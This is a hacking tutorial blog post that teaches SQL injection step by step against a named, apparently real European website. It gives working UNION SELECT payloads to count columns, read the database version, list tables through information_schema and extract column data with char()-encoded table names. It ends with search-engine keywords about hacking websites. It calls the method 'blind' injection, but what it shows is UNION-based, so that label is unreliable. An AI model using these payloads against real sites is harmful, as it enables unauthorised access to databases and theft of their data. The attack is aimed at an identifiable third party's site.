In this tutorial you will learn how to hack a vulnerable website using Blind Sql Injection Attack. As you have seen in my previous post on How to hack Website using SQL Injection with easy Steps. This post have slight difference to the previous one. There are over 30 million of sites available on internet and 16% of them are highly vulnerable to SQL injection attack. In this article I will teach you what exactly is SQL injection, how it works and how to perform.
Today we are gonna access the database of a European site http://www.adas-fusion.eu/
What is SQL Injection?
SQL injection is an attack used to exploit a security vulnerability in a website. This vulnerability occurs when the sever gives the direct response to the client. An attacker can communicate with the sever through MySQL by giving SQL commands.This happens because the user input is incorrectly filtered by the website. Taking advantage of this an attacker can inject a piece of code into the database and can take control over it.
Anyways, I am just going to teach you how to get the access to the database and retrieving the content from it. This will be explained manually so you gotta pay some attention. There are several tools which perform this attack automatically, all you just need to do is, provide the tool with a vulnerable link.
So let’s get started!!!
Step 1: Checking if the link is vulnerable or not.
This is the vulnerable link of the site which I mentioned above, http://www.adas-fusion.eu/theme.php?id=2. To know whether the link is vulnerable or not just add “ ‘ ” (Single quote) at the end of the link. That will look like this:
You can see that when you open the link by adding a single quote you are getting an error saying:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1″
If the website is displaying the above line then it means, that this site is SQL injection vulnerable! Hence we can proceed further getting the number of columns in it.
Step 2: Finding number of columns in the database.
Search the link followed by the syntax “order by number–” and hit enter. Replace ”number“ by any number which you assume to be the number of columns in the targeted website. Start with the number ’10′ hence the link will look like,
If you are getting an error display in the page then that means, the actual number of columns is less than number you assumed. So now try each of 9,8,7…. so on till you get a page without error.
For this site you will get error till 7 and at 6 you will have a proper page display without any error. Just check it out here:
So that means there are 6 columns in the database!
Step 3: Finding the vulnerable columns
The next command goes like this:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,6–
After you open this link you will find the vulnerable column that is 6. To know the vulnerable column just check the column number in the page.
If the version of the database is above 5.0 then we can move further. For the sites less than version 5.0 we use blind SQL injection. To know the version of the database just type the following:
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,version()–
Here the version is 5.1.67 therefore it can be hacked using this method, lets move ahead.
Step 5: Retrieving the tables.
Now we use group_concat(table_name) function to get the tables available.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,group_concat(table_name) from information_schema.tables
After the page gets loaded you will get the entire list of the tables available. Now next you just have to note down the important tables (tables in caps are present by default, therefore the important data is always present in the tables named with lowercase, but not always).
Step 6: Getting the data from the tables.
This is the last step… Now you get the data from the tables which you have noted in the above step.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(ASCII)–
Just replace the ASCII with the ASCII value of the table. Online string to ASCII converters are available.
The above is the ASCII code of the table task.
http://www.adas-fusion.eu/theme.php?id=2 union all select 1,2,3,4,5,column_name from information_schema.columns where table_name=char(116,97,115,107)–
This link will give you the data contained in the table.
After this you can proceed further by applying steps mentioned in my previous post i.e. How to hack Website using SQL Injection with easy Steps.
website hacking sql injection
sql injection for hacking websites
how to hack websites by sql injection
how to hack a website with sql injection
how to hack a website using sql injection